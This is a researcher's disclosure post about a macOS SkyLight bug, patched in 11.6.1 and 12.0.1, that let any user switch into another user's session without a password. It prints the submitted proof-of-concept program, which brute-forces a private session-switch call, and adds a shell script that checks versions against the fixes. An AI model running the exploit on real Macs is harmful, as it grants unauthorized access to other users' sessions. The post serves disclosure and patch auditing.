SkyLight user session exploit
While working on non-Metal acceleration in 2021, I stumbled on a WindowServer bug allowing any user to switch to another user's session without entering their password. Apple fixed the bug in macOS 11.6.1 and 12.0.1 and paid me a generous bounty.

Bizarrely, the bug was reintroduced at some point in Ventura, and fixed again in late 2023, resulting in a second bounty payment.
thanks
ASentientHedgehog and Emma (916253) tested on countless versions and helped me navigate the reporting process. Thank you!
code
This is the program I submitted to Apple. It simply brute-forces SLSSessionSwitchToSessionID, which lacked the necessary checks. A real attacker would do something cleverer; session IDs are readily available in logs and other APIs.
// clang -fmodules -F /System/Library/PrivateFrameworks -framework SkyLight thing.m -o thing
@import Foundation;
#include <stdio.h>

// Private SkyLight entry points. The switch call is the one that lacked the check Apple's fix added.
void SLSSessionSwitchToSessionID(int);
NSDictionary* SLSCopyCurrentSessionDictionary();
extern NSString* kCGSSessionOnConsoleKey;

int main()
{
    for (int guess = 0; ; guess++)
    {
        // "Copy" rule: the dictionary comes back retained, so it is released below (ARC is off here).
        NSDictionary* dict = SLSCopyCurrentSessionDictionary();
        // Once our own session is no longer the one on the console, a switch has happened.
        if ([dict[kCGSSessionOnConsoleKey] isEqual:@false])
        {
            printf("😁\n");
            return 0;
        }
        [dict release];
        SLSSessionSwitchToSessionID(guess);
    }
}
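For anyone auditing a fleet against this, the practical question is simply whether a given Mac is on a build that carries the fix. The following shell script is an added example, not the author's code: it classifies a macOS product version against the two fix versions the post names (11.6.1 and 12.0.1). Anything on Ventura is reported as "unknown" because the post says the bug returned there and was fixed again in late 2023 but does not give a version number, and majors the post does not mention are treated the same way. The function names `vercmp` and `sl_session_fix_status` are my own.

```shell
#!/bin/sh
# Added example (not from the original post). Classifies a macOS
# productVersion against the fix versions named in the post: 11.6.1 and 12.0.1.
# Usage on a Mac:  sh check.sh "$(sw_vers -productVersion)"

# Compare two dotted version strings, printing -1, 0 or 1 (a<b, a==b, a>b).
# Missing trailing components count as 0, so "11.6" compares as "11.6.0".
vercmp() {
    a=$1; b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        ai=${a%%.*}; bi=${b%%.*}
        case $a in *.*) a=${a#*.};; *) a='';; esac
        case $b in *.*) b=${b#*.};; *) b='';; esac
        ai=${ai:-0}; bi=${bi:-0}
        if [ "$ai" -gt "$bi" ]; then printf '%s\n' 1; return 0; fi
        if [ "$ai" -lt "$bi" ]; then printf '%s\n' -1; return 0; fi
    done
    printf '%s\n' 0
}

# Print "patched", "vulnerable" or "unknown" for a productVersion string.
# Only the two fix versions stated in the post are encoded; Ventura (13.x)
# and any other major are "unknown" because the post gives no version for them.
sl_session_fix_status() {
    v=$1
    case ${v%%.*} in
        11) if [ "$(vercmp "$v" 11.6.1)" -ge 0 ]; then echo patched; else echo vulnerable; fi ;;
        12) if [ "$(vercmp "$v" 12.0.1)" -ge 0 ]; then echo patched; else echo vulnerable; fi ;;
        *)  echo unknown ;;
    esac
}

# When run as a script with a version argument, print the classification.
if [ $# -gt 0 ]; then
    sl_session_fix_status "$1"
fi
```

The check is deliberately narrow: it answers only whether the build predates the fixes the post names, not whether the machine is current on security updates in general, so treat "patched" here as "not exposed to the 2021 variant" and nothing more.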